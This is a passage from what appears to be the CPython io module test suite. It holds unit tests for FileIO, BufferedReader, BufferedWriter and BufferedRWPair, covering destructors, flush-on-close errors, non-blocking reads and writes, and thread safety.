with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
